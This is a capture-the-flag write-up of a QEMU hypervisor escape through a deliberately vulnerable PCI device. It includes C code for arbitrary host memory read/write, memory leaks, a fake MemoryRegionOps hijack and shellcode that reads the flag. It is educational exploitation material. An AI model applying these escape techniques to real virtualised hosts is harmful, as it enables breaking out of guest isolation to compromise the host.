CloudInspect was a hypervisor exploitation challenge I worked on during the Hack.lu event. I didn’t manage to flag it within the 48 hours :(. But anyway, I hope this write-up will be interesting to read! The related files can be found right here
After Whiterock released its trading bot cloud with special Stonks Sockets, another hedge fund, Castel, comes with some competition. The special feature here is called “cloudinspect”. The flag is located right next to the hypervisor. Go get it!
Vulnerable PCI device
We got several files:
$ ls
build_qemu.sh diff_chall.txt flag initramfs.cpio.gz qemu-system-x86_64 run_chall.sh vmlinuz-5.11.0-38-generic
According to diff_chall.txt, the provided qemu binary is patched with some vulnerable code. Let’s take a look at the diff file:
The first thing I did when I saw this was to check how the memory_region_init_io and pci_register_bar functions work. It looks a bit like a kernel device that registers a few handlers for basic operations like read / write / ioctl. Very quickly I found two write-ups from dangokyo, this one and this other one. I recommend checking them out, they are pretty interesting and well written.
PCI stands for Peripheral Component Interconnect, a standard that describes the interactions between the CPU and the other physical devices. The PCI device handles the interactions between the system and the physical device. To do so, it exposes a physical address space to the kernel, reachable through the kernel abstractions from a particular virtual address range. This address space can be used to cache some data, but it is mainly used by the kernel to request a particular behavior from the physical device. These requests are written at well-defined offsets in the PCI address space: the I/O registers. In the same way, the device waits for values at these locations to trigger a particular behavior. Check out this and this to learn more about PCI devices!
Now that we know a bit more about PCI devices, we can see that the patched code is a PCI interface between the Linux guest operating system and .. nothing. It is just a vulnerable PCI device which allows us to read and write four I/O registers (CNT, SRC, CMD and DST). Through these registers, we can read and write at an arbitrary location. There is a check on the size requested for read / write operations, which are performed at a given offset from the dmabuf base address, but since the offset itself is not checked and we control it, the check does not matter.
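To make the flaw concrete, here is a small self-contained model of the check described above. It is not the code from diff_chall.txt: the object layout, the value of `DMA_SIZE` and the names `model_dma_get`, `DMABUF_OFF` and `OBJ_SIZE` are assumptions chosen for illustration. Only the transfer size is validated, so a negative offset reaches whatever is stored before the buffer.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define DMA_SIZE   0x1000u  /* assumed buffer size, for illustration only */
#define DMABUF_OFF 0x1000   /* hypothetical position of dma_buf inside the object */
#define OBJ_SIZE   0x3000   /* hypothetical size of the modeled object */

/* Flat byte array standing in for the device object: fields, dma_buf, more fields. */
static uint8_t obj[OBJ_SIZE];

/* Mirrors the flawed logic: cnt is bounded, off is not. Returns 0 on success. */
static int model_dma_get(int64_t off, uint64_t cnt, void *out)
{
    if (cnt > DMA_SIZE)  /* the only check performed */
        return -1;
    /* A correct device would also require 0 <= off and off + cnt <= DMA_SIZE. */
    memcpy(out, obj + (DMABUF_OFF + off), cnt);
    return 0;
}

/* Example: leak an 8-byte field that sits 0x10 bytes before dma_buf. */
static uint64_t demo_leak(void)
{
    uint64_t secret = 0xdeadbeefcafef00dULL, leaked = 0;
    memcpy(obj + DMABUF_OFF - 0x10, &secret, sizeof secret);
    int rc = model_dma_get(-0x10, sizeof leaked, &leaked);
    assert(rc == 0);
    (void)rc;
    return leaked;
}
```

In this model `demo_leak()` returns the value planted before the buffer, while a request larger than `DMA_SIZE` is still rejected.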
To write these registers from userland, we need to mmap the resource file corresponding to the PCI device. Then we just have to read or write the mapping at the offset corresponding to the register we want to access. Furthermore, the arbitrary read / write primitives provided by the device copy data to / from a guest memory area designated by its physical address, so we also need the physical address of a buffer we control.
The resource file can be found by getting a shell on the machine to take a look at the output of the lspci command.
/ # lspci -v
00:01.0 Class 0601: 8086:7000
00:00.0 Class 0600: 8086:1237
00:01.3 Class 0680: 8086:7113
00:01.1 Class 0101: 8086:7010
00:02.0 Class 00ff: 1337:1337
The output of the command is structured like this:
Field 1 : 00:02.0 : bus number (00), device number (02) and function (0)
Field 2 : 00ff : device class
Field 3 : 1337 : vendor ID
Field 4 : 1337 : device ID
According to the source code of the PCI device, the vendor ID and the device ID are both 0x1337, so the resource file corresponding to the device is /sys/devices/pci0000:00/0000:00:02.0/resource0.
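A minimal sketch of how the resource file can be mapped and used as a register window. The helper names `map_bar`, `mmio_write64` and `mmio_read64` are hypothetical, and the 64-bit access width is an assumption about what the device accepts; the path only exists inside the challenge guest.

```c
#include <assert.h>
#include <fcntl.h>
#include <stddef.h>
#include <stdint.h>
#include <sys/mman.h>
#include <unistd.h>

/* Path derived from the lspci output; only valid inside the challenge guest. */
#define RESOURCE0 "/sys/devices/pci0000:00/0000:00:02.0/resource0"

/* Map `size` bytes of a PCI resource file; returns NULL on failure. */
static volatile uint8_t *map_bar(const char *path, size_t size)
{
    int fd = open(path, O_RDWR | O_SYNC);
    if (fd == -1)
        return NULL;
    void *p = mmap(NULL, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    close(fd);  /* the mapping stays valid after the descriptor is closed */
    return p == MAP_FAILED ? NULL : (volatile uint8_t *)p;
}

/* Register accessors; the 64-bit width is an assumption about the device. */
static void mmio_write64(volatile uint8_t *bar, uint64_t reg, uint64_t val)
{
    assert(bar != NULL);
    *(volatile uint64_t *)(bar + reg) = val;
}

static uint64_t mmio_read64(volatile uint8_t *bar, uint64_t reg)
{
    assert(bar != NULL);
    return *(volatile uint64_t *)(bar + reg);
}
```

In the guest, something like `map_bar(RESOURCE0, 0x1000)` would return the window, and every store through `mmio_write64` ends up in the device's write handler instead of ordinary memory.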
Device interactions
To interact with the device, we need the physical address of a memory area we control, which acts as a shared buffer between our program and the PCI device. To get one we can mmap a few pages, malloc a buffer, or just allocate a large buffer in the function’s stack frame. Given that I was following dangokyo’s write-up, I just reused a few of the functions he was using, especially for the shared buffer.
The function used to get the physical address corresponding to an arbitrary pointer is based on the /proc/self/pagemap pseudo-file, for which you can read the format here. The virt2phys function looks like this:
#include <assert.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <unistd.h>

uint64_t virt2phys(void* p) {
    uint64_t virt = (uint64_t)p;
    assert((virt & 0xfff) == 0);  // p must be page-aligned

    int fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd == -1)
        perror("open");

    // The pagemap holds one 64-bit entry per virtual page, so the entry for
    // this page is at index (address / PAGE_SZ), i.e. at byte offset index * 8.
    uint64_t offset = (virt / 0x1000) * 8;
    lseek(fd, offset, SEEK_SET);

    uint64_t phys;
    if (read(fd, &phys, 8) != 8)
        perror("read");
    close(fd);

    assert(phys & (1ULL << 63));  // bit 63: the page is present in RAM
    // Mask out the status bits (the PFN is stored in bits 0-54) and turn the
    // page frame number into a physical address.
    phys = (phys & ((1ULL << 55) - 1)) * 0x1000;
    return phys;
}
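The two computations done by virt2phys can be checked in isolation. The sketch below is only a worked example: the helper names are hypothetical, the addresses used with it are made up, and the bit layout (PFN in bits 0-54, present flag in bit 63) follows the kernel pagemap documentation.

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_SZ     0x1000ULL
#define PM_PRESENT  (1ULL << 63)        /* bit 63: page present in RAM */
#define PM_PFN_MASK ((1ULL << 55) - 1)  /* bits 0-54: page frame number */

/* Byte offset of the 8-byte pagemap entry describing `virt`. */
static uint64_t pagemap_offset(uint64_t virt)
{
    return (virt / PAGE_SZ) * sizeof(uint64_t);
}

/* Physical address encoded by a pagemap entry, keeping the in-page offset. */
static uint64_t pagemap_to_phys(uint64_t entry, uint64_t virt)
{
    assert(entry & PM_PRESENT);
    return (entry & PM_PFN_MASK) * PAGE_SZ + (virt & (PAGE_SZ - 1));
}
```

For instance, the entry for a page at 0x7ffff7a00000 lives at offset 0x3ffffbd000 in the pagemap, and an entry holding PFN 0x1234 translates an address ending in 0xabc to 0x1234abc.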
To interact with the device we can write the code right below:
mlock(dmabuf, 0x1000);                 // trigger a page fault to actually map the page
dmabuf_phys_addr = virt2phys(dmabuf);  // grab the physical address from the pagemap
printf("DMA buffer (virt) @ %p\n", dmabuf);
printf("DMA buffer (phys) @ %p\n", (void*)dmabuf_phys_addr);
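The snippet above does not show how dmabuf itself is obtained. One possible way, sketched here under the assumption that a single anonymous page is enough, is to mmap it so that it is page-aligned, which virt2phys requires. The name `alloc_dma_page` is hypothetical.

```c
#define _DEFAULT_SOURCE  /* for MAP_ANONYMOUS under strict -std= modes */
#include <assert.h>
#include <stdint.h>
#include <string.h>
#include <sys/mman.h>

#define PAGE_SZ 0x1000

/* Allocate one page-aligned, resident page to share with the device. */
static void *alloc_dma_page(void)
{
    void *p = mmap(NULL, PAGE_SZ, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED)
        return NULL;
    memset(p, 0, PAGE_SZ);    /* touch the page so it is actually backed */
    (void)mlock(p, PAGE_SZ);  /* best effort: keep the page resident */
    assert(((uintptr_t)p & (PAGE_SZ - 1)) == 0);  /* virt2phys expects alignment */
    return p;
}
```

Touching the page before asking for its physical address matters: an untouched anonymous page has no frame yet, so its pagemap entry would not have the present bit set.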
Now that we can interact with the device, we have two arbitrary read / write primitives. The read_offt and write_dmabuf functions let us read / write 8 bytes at an arbitrary offset from the dmabuf object address.
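The bodies of read_offt and write_dmabuf are not shown in this write-up, so the following is only a sketch of what they could look like. To keep it runnable outside the guest, `iowrite` is replaced by a small in-process mock of the device; the register indices, the command values and the register roles for the GET direction are placeholders and assumptions, not values taken from diff_chall.txt.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Placeholder register indices and command values, NOT taken from diff_chall.txt. */
enum { REG_CMD, REG_SRC, REG_DST, REG_CNT, REG_TRIGGER, REG_MAX };
enum { DMA_GET_VALUE = 1, DMA_PUT_VALUE = 2 };

#define DMABUF_OFF 0x100            /* hypothetical offset of dma_buf in the object */
static uint8_t  device_obj[0x200];  /* mock device object */
static uint8_t  guest_page[0x100];  /* mock guest page, "physical address" 0 */
static uint64_t regs[REG_MAX];

/* Mock of iowrite(): latches the register and runs the transfer on TRIGGER. */
static void iowrite(unsigned reg, uint64_t val)
{
    assert(reg < REG_MAX);
    regs[reg] = val;
    if (reg != REG_TRIGGER || regs[REG_CNT] > sizeof guest_page)
        return;  /* like the device, only the size is checked */
    if (regs[REG_CMD] == DMA_PUT_VALUE)       /* guest memory -> device object */
        memcpy(device_obj + DMABUF_OFF + (int64_t)regs[REG_DST],
               guest_page + regs[REG_SRC], regs[REG_CNT]);
    else if (regs[REG_CMD] == DMA_GET_VALUE)  /* device object -> guest memory */
        memcpy(guest_page + regs[REG_DST],
               device_obj + DMABUF_OFF + (int64_t)regs[REG_SRC], regs[REG_CNT]);
}

/* Read the 8 bytes located `off` bytes away from dma_buf. */
static uint64_t read_offt(int64_t off)
{
    uint64_t v;
    iowrite(REG_CMD, DMA_GET_VALUE);
    iowrite(REG_SRC, (uint64_t)off);
    iowrite(REG_DST, 0);  /* would be dmabuf_phys_addr on the real target */
    iowrite(REG_CNT, sizeof v);
    iowrite(REG_TRIGGER, 1);
    memcpy(&v, guest_page, sizeof v);
    return v;
}

/* Write 8 bytes `off` bytes away from dma_buf. */
static void write_dmabuf(int64_t off, uint64_t v)
{
    memcpy(guest_page, &v, sizeof v);
    iowrite(REG_CMD, DMA_PUT_VALUE);
    iowrite(REG_DST, (uint64_t)off);
    iowrite(REG_SRC, 0);  /* would be dmabuf_phys_addr on the real target */
    iowrite(REG_CNT, sizeof v);
    iowrite(REG_TRIGGER, 1);
}
```

On the real target the mock would be replaced by a store into the mmap'ed resource file, and the shared page would be the buffer whose physical address was obtained with virt2phys.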
Exploitation
I tried a lot of things which didn’t work, so let’s summarize all my thoughts:
If we leak the object’s address, we can write to any location whose base address we know, for example to overwrite GOT pointers (but it will not succeed because of RELRO).
If we take a look at all the memory areas mapped in the qemu process, we can see a very large rwx memory area, which means that if we can leak its address and redirect RIP, we just have to write a shellcode in this area and jump to it.
To achieve the leaks, given that the CloudInspectState structure is allocated on the heap, and that we can read / write at an arbitrary offset from the object’s address we can:
Scan heap memory for pointers to the qemu binary to leak the base address of the binary.
Scan heap memory for pointers to the heap itself (next, prev pointers for freed objects for example), and then compute the object’s address.
Scan heap memory to leak the rwx memory area
Scan all the memory area we can read to find a leak of the rwx memory area.
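The scanning steps listed above boil down to reading memory qword by qword and keeping the values that look like pointers into a region of interest. A minimal sketch, where the function name and the address ranges are assumptions (the usual x86-64 Linux heuristic is that PIE and heap addresses start with 0x55 or 0x56 and mmap'ed areas with 0x7f):

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Return the index of the first qword lying in [lo, hi), or -1 if none does. */
static ptrdiff_t find_ptr_in_range(const uint64_t *qwords, size_t n,
                                   uint64_t lo, uint64_t hi)
{
    assert(lo < hi);
    for (size_t i = 0; i < n; i++)
        if (qwords[i] >= lo && qwords[i] < hi)
            return (ptrdiff_t)i;
    return -1;
}
```

In the exploit, `qwords` would be filled by repeated 8-byte reads at increasing offsets, and a hit only gives a candidate: the offset between the leaked pointer and the base of its region still has to be known.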
To redirect RIP I considered two options:
Overwrite the destructor function pointer in the MemoryRegion structure.
Write in a writable area a fake MemoryRegionOps structure for which a certain handler points to our shellcode and make CloudInspectState.mmio.ops point to it.
In this environment, scanning the heap memory is not reliable at all. Locally, I managed to leak the rwx memory area, the binary base address and the heap base address from some contiguous objects in the heap. To redirect RIP, for some reason the destructor is never called, so we have to craft a fake MemoryRegionOps structure. And that’s how I read the flag on the disk. But the issue is that remotely, the offset between the heap base and the object is not the same and, I guess, the offset of the rwx memory leak is different as well. So we have to find a different way to leak the object and the rwx memory area.
Leak some memory areas
To see where we can find pointers to the rwx memory area, we can make use of the search command in pwndbg:
Given that we don’t want to get the leak from the heap because of its unreliability, we can see that there are leaks available in a writable area of the binary, in anon_559a89353. Indeed, the page address looks like a PIE binary address or a heap address (but the area is not marked as heap), and if we look more carefully, the page is contiguous to the last file-mapped memory area. Now that we can leak the rwx memory area, let’s find a way to leak the object’s address! I asked for a hint on the hack.lu discord for this leak because I didn’t have any idea. And finally it’s quite easy: we can just leak the opaque pointer in the MemoryRegion structure, which points to the object’s address.
If I summarize we have:
A reliable leak of:
the object’s address with the opaque pointer
the binary base address (from the heap)
the rwx memory area (writable memory area that belongs to the binary).
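With these leaks, an absolute target address has to be turned into an offset relative to the buffer before it is handed to the device. A small sketch of that arithmetic, with a hypothetical helper name and made-up addresses; the subtraction is done on unsigned 64-bit values so it also works for targets below the base.

```c
#include <assert.h>
#include <stdint.h>

/* Offset to give the device so that base + offset lands on target. */
static uint64_t dma_offset(uint64_t target, uint64_t base)
{
    uint64_t off = target - base;  /* wraps modulo 2^64 when target < base */
    assert(base + off == target);  /* the device-side addition undoes the wrap */
    return off;
}
```

For example, a target 0xd0 bytes before the base yields 0xffffffffffffff30, which the device-side pointer addition treats as -0xd0.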
I chose to write a shellcode that reads the flag into leak_rwx + 0x5000, a known location we can easily read and print from the program. The shellcode is very simple:
mov rax, 2                    ; SYS_open
push 0x67616c66               ; "flag" in little endian
mov rdi, rsp                  ; pointer to the "flag" string
mov rsi, 0                    ; O_RDONLY
mov rdx, 0x1fd                ; mode (ignored without O_CREAT)
syscall
mov rdi, rax                  ; fd
xor rax, rax                  ; SYS_read
lea rsi, [rip]                ; pointer into the rwx memory area (we're executing code within it)
and rsi, 0xffffffffff000000   ; compute the base address
add rsi, 0x5000               ; add the right offset
mov rdx, 0x30                 ; length of the flag to read
syscall
add rsp, 8                    ; we pushed the flag string, so we pop it
ret                           ; return to continue the execution
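Two constants in this shellcode can be double-checked with a few lines of C. The helper names are hypothetical and a little-endian host is assumed, as on x86-64. Note that the mask only recovers the base if the rwx area starts on a 16 MiB boundary, since it clears the low 24 bits.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Bytes that `push 0x67616c66` leaves at [rsp]: imm32 sign-extended to 64 bits. */
static void pushed_bytes(char out[8])
{
    uint64_t slot = (uint64_t)(int64_t)(int32_t)0x67616c66;
    assert(out != NULL);
    memcpy(out, &slot, sizeof slot);  /* little-endian host assumed */
}

/* Destination computed by the lea / and / add sequence for a given rip. */
static uint64_t flag_dest(uint64_t rip)
{
    return (rip & 0xffffffffff000000ULL) + 0x5000;
}
```

The pushed qword is the NUL-terminated string "flag", and for a shellcode running around 0x7fe3dc001000 the read buffer ends up at 0x7fe3dc005000.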
To write the shellcode at leak_rwx + 0x1000, we can directly trigger a large write primitive:
To craft a fake MemoryRegionOps, I just read the original MemoryRegionOps structure, edited the read handler, and wrote it back in a writable memory area, at leak_rwx+0x2000. Given that sizeof(MemoryRegionOps) is not larger than DMA_SIZE, I can read and write it in one go. Then we get:
// Write it in the fake struct
memcpy(&fake_ops, dmabuf, sizeof(struct MemoryRegionOps));
// Edit the handler we want to hook to make it point to the shellcode at leak_rwx + 0x1000
fake_ops.read = (leak_rwx + 0x1000);

// patch it and write it @ leak_rwx + 0x2000
iowrite(CLOUDINSPECT_MMIO_OFFSET_CMD, CLOUDINSPECT_DMA_PUT_VALUE);
iowrite(CLOUDINSPECT_MMIO_OFFSET_DST, leak_rwx - addr_obj + 0x2000);
iowrite(CLOUDINSPECT_MMIO_OFFSET_CNT, sizeof(struct MemoryRegionOps));
iowrite(CLOUDINSPECT_MMIO_OFFSET_SRC, dmabuf_phys_addr);
iowrite(CLOUDINSPECT_MMIO_OFFSET_TRIGGER, 0x300);
Hook mmio.ops + PROFIT
We just have to replace the original CloudInspectState.mmio.ops pointer with a pointer to the fake_ops structure. Then, the next time we send a read request, the shellcode will be executed! After that we just need to restore the original CloudInspectState.mmio.ops pointer to read the flag at leak_rwx+0x5000! Which gives:
write_dmabuf(-0xd0, leak_rwx+0x2000);  // Set the pointer to the MemoryRegionOps to the fake MemoryRegionOps

ioread(0x37);  // trigger the read handler we control, then the shellcode is
               // executed and the flag is written @ leak_rwx + 0x5000
// addresses are different because this is another execution, on the remote challenge
/*
b'[*] CloudInspectState.mmio.ops.read () => jmp @ 7fe3dc001000\r\r\n'
b'[*] CloudInspectState.mmio.ops = original ops\r\r\n'
b'[*] Reading the flag @ 7fe3dc005000\r\r\n'
b'flag: flag{cloudinspect_inspects_your_cloud_0107}\r\r\n'
flag: flag{cloudinspect_inspects_your_cloud_0107}
*/
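The hook-and-restore idea used here can be reproduced in a harmless, in-process model. The structures below are simplified stand-ins (the real QEMU MemoryRegion and MemoryRegionOps have many more fields), and every name in this sketch is hypothetical; the point is only that an MMIO read is an indirect call through a table we can swap.

```c
#include <assert.h>
#include <stdint.h>

/* Simplified stand-ins: the real QEMU structures have more fields. */
struct ops    { uint64_t (*read)(void *opaque, uint64_t addr, unsigned size); };
struct region { const struct ops *ops; void *opaque; };

static uint64_t original_read(void *opaque, uint64_t addr, unsigned size)
{
    (void)opaque; (void)size;
    return addr;  /* benign behaviour */
}

static uint64_t payload(void *opaque, uint64_t addr, unsigned size)
{
    (void)addr; (void)size;
    *(int *)opaque = 1;  /* stands in for the shellcode's side effect */
    return 0;
}

/* What the hypervisor does on a guest MMIO read: an indirect call through ops. */
static uint64_t dispatch_read(struct region *mr, uint64_t addr)
{
    assert(mr->ops && mr->ops->read);
    return mr->ops->read(mr->opaque, addr, 8);
}
```

Copying the table, patching `read` in the copy, pointing `ops` at the copy and then triggering one read runs the payload; putting the saved pointer back afterwards restores normal behaviour, which is why the device keeps working while the flag is fetched.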
Thanks to the organizers for this awesome event! The other pwn challenges look very interesting as well! You can find the final exploit here.